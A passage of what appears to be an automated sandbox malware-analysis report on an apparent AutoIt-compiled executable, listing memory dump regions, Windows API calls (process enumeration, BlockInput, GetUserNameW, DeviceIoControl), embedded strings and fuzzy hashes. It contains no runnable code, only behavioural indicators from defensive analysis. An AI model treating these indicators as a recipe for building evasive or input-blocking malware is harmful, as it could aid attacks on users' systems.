                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                              • Opcode ID: 3e796443b32a8b3bdf9e1bdecc7efb80abba43e064a0edbfc7cf48cc6be3d1d4
                                                                                                                                                                                                              • Instruction ID: d859e92c6f63cf1e7fe148d4552bb1439d648a418f7f8c43b5f75dfc89c2ee36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e796443b32a8b3bdf9e1bdecc7efb80abba43e064a0edbfc7cf48cc6be3d1d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B931D1711083419FC304EF55D885BAFBBE8EF95300F20092DF592D21A1EBB1AA49CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C342FF
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00C3433C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C34345
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 33631002-0
                                                                                                                                                                                                              • Opcode ID: 1fcbbef6addace8e9c5344f852752628b7bf3bef0491932ba8ae66574194b905
                                                                                                                                                                                                              • Instruction ID: 2fc215a6b5c8c3f4e2b9a634351d7866e3d99cdf43ca19313a9f803c4360ec11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fcbbef6addace8e9c5344f852752628b7bf3bef0491932ba8ae66574194b905
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 671182B1910229BEE7109BE99C48FBFB7BCEB09710F100556F914F71A0C2B4AE4487A1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C49B52,?,00C6098C,?), ref: 00C3A6DA
                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C49B52,?,00C6098C,?), ref: 00C3A6EC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                              • Opcode ID: 6b95ab8da8b5090e3e56412032bd4e7d4ed0f8d0c2eca64ab3faa58e665c4795
                                                                                                                                                                                                              • Instruction ID: 0991bf6f4204f6a54e346ca312c08cd2de10ab442ae97715cdd3a3ba5a9d1815
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b95ab8da8b5090e3e56412032bd4e7d4ed0f8d0c2eca64ab3faa58e665c4795
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0823551422DBBDB20AFA5CC49FEA77ACBF09361F008165F91896191D6709A50CBA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00BFA38A
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BFA393
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: b2ce42b11ecbb7520a5108834ee34bec068e5a23a31d7048e2707a2f4a0fcc64
                                                                                                                                                                                                              • Instruction ID: 17dcd3377d2822a504bf7cc654973fbd6950eb6cb1a9aec4ac5ca671e5ae7273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2ce42b11ecbb7520a5108834ee34bec068e5a23a31d7048e2707a2f4a0fcc64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CB09231064608ABCA502B92EC09B8E3F68EB44A63F104020F60D54270EBE254508A91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 00C445F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                                                              • Opcode ID: 5ac13f5283893d1cdc47d162aac909520bdb29ea71ebc6a269ad980a8c71e22a
                                                                                                                                                                                                              • Instruction ID: 8180f9acb652c1e605e42e8e756409dc89b4c30a4a49028e9844c72975ab8d48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ac13f5283893d1cdc47d162aac909520bdb29ea71ebc6a269ad980a8c71e22a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DE0DF352002099FD710AF5AE800F8BF7E8EF98760F108426FC09D7350EAB0ED008B90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00C10734
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                                              • Opcode ID: 6a376ee32c61c9d19ff212a4e5ab9ed77e9826dbc924c29f90b30ab8b6088f50
                                                                                                                                                                                                              • Instruction ID: c7ce1097480e6b40093381032f4b0bccae17e8239c05c993ddf1572d55b57bbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a376ee32c61c9d19ff212a4e5ab9ed77e9826dbc924c29f90b30ab8b6088f50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC04CF1800109DBCB15DBA1D988FEF7BBCBB08305F200455E105B2100D7B49B849A71
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00BFA35A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 96c4afd2ea1e243768060ac065d5bd4fb6136bb343399466e63dac7521c6ff51
                                                                                                                                                                                                              • Instruction ID: 6edea7b9a8a2ca1832c0a88f355d747296a1063f4fbd128dceab2c928e3efeb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96c4afd2ea1e243768060ac065d5bd4fb6136bb343399466e63dac7521c6ff51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8A0243001010CF7CF001F43FC0454D7F5CD7001517004030F40C00131D773541045C0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                                              • Instruction ID: abc1f0a6d292ab0b1819f9536a49624264d2c8ac95166a3c2bd9b3e456962037
                                                                                                                                                                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF0C8313145699FDBA8EE1C9CA1A797795DB54200F58C839FD4BCF241DA31DA008251
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                                              • Instruction ID: 549e0ae3304e08acda2ae0b6b4b58942f97ed647294d162e68b603d508580c78
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F082B22483049FCB1CDF09C4E0BB977A6AF80715F14406CE50BDF640D7359A41C659
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                              • API String ID: 2660009612-1645009161
                                                                                                                                                                                                              • Opcode ID: 15e3df6d1756dde36f4a0ea916575bd4352c84dfd19adf31cbe18904d16de4e5
                                                                                                                                                                                                              • Instruction ID: 54ec6c1afcccc0704c9833051bdde70ad45a321a65c5c7a1b96320f85f86ee5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15e3df6d1756dde36f4a0ea916575bd4352c84dfd19adf31cbe18904d16de4e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8A1A231A00249BBCB24AF62DC92EBE37F8AF45740F1440B9FD15AB292DB719E45E750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00C5A0F7
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C5A1B0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C5A1CC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                                                                                                                              • Opcode ID: c6be0fbffed4779abec190eb67e8135c9b61b021116c05f3f57d40075da64ac5
                                                                                                                                                                                                              • Instruction ID: 047f77c108a7dccf143557daff7da95c86ac48c069e79f216ae3f5bf28c9c65b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6be0fbffed4779abec190eb67e8135c9b61b021116c05f3f57d40075da64ac5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A02E134104301AFDB25CF16C849BAABBE4FF85306F04861DFDA9972A1D774DA88CB56
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00BF04E3
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 00C266BB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Foreground_memmove
                                                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                              • API String ID: 3828923867-1919597938
                                                                                                                                                                                                              • Opcode ID: 258fbb5531947a3aa96f4213b8f7060fec27d30a8166bff328ee78819922e681
                                                                                                                                                                                                              • Instruction ID: 0ae215b80a659696d5fe2ca1f552207ecfe8857d3636cd169486265a4535cfce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 258fbb5531947a3aa96f4213b8f7060fec27d30a8166bff328ee78819922e681
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43D11730104256DFDB14FF21D4819AABBF4FF54304F204A69F9A653A62DB30EA59CBA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00C544AC
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C5456C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                              • API String ID: 3974292440-719923060
                                                                                                                                                                                                              • Opcode ID: a52be8613d70e40b9a00cdb41c4dbca5147f643df4a91694dfb1c674b8ae865d
                                                                                                                                                                                                              • Instruction ID: c2195f9b70440fe0722df5caefb9a4b6e960062f6d3f53cec91cfb7eb85c02bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a52be8613d70e40b9a00cdb41c4dbca5147f643df4a91694dfb1c674b8ae865d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99A1A2782142019FCB18FF10C851A6AB3E5FF89319F1049A9FC665B7A2DB30ED89CB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C5A87E
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00C5A8F8
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00C5A972
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C5A994
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C5A9A7
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00C5A9C9
                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00C5AA00
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C5AA19
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00C5AA32
                                                                                                                                                                                                              • GetWindowRect.USER32 ref: 00C5AA39
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C5AA51
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C5AA69
                                                                                                                                                                                                                • Part of subcall function 00BD29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BD29BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                                                                                                              • Opcode ID: fe702dd77c9f620dc8b83cb7041315f299f7976e085b789656a74b6d5ff83c34
                                                                                                                                                                                                              • Instruction ID: 2b8ec03a8902e1302b1b96d88db74deb4aeb13d9949b99b5292c525348d3288d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe702dd77c9f620dc8b83cb7041315f299f7976e085b789656a74b6d5ff83c34
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5571CA74150240AFD721CF29CC48FAB7BE5FB88301F140A1DF996972A1D770EA49DB6A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00C3831A
                                                                                                                                                                                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00C38323
                                                                                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00C3832F
                                                                                                                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C3841D
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3844D
                                                                                                                                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00C38479
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00C3852A
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00C385BE
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00C38618
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00C38627
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00C38665
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                              • API String ID: 3730832054-3931177956
                                                                                                                                                                                                              • Opcode ID: 8dbd28701c5d25df2d59f4632a68c774a0b909a1f4d2887552e313b0a59523c3
                                                                                                                                                                                                              • Instruction ID: 5f2cf99d21f8c848d170863e22d94a12eaae7cd81fa3258b135514cec518c1bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dbd28701c5d25df2d59f4632a68c774a0b909a1f4d2887552e313b0a59523c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCD10071624205EBDB609F66C884BBEB7B4FF04B00F248595F415AB2A1DF70ED48DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00C3E31F
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C3E32F
                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C3E33B
                                                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00C3E399
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00C3E3B1
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00C3E3C3
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C3E3D8
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C3E3EC
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C3E41E
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C3E43F
                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00C3E44B
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C3E48A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                                                              • String ID: *.*
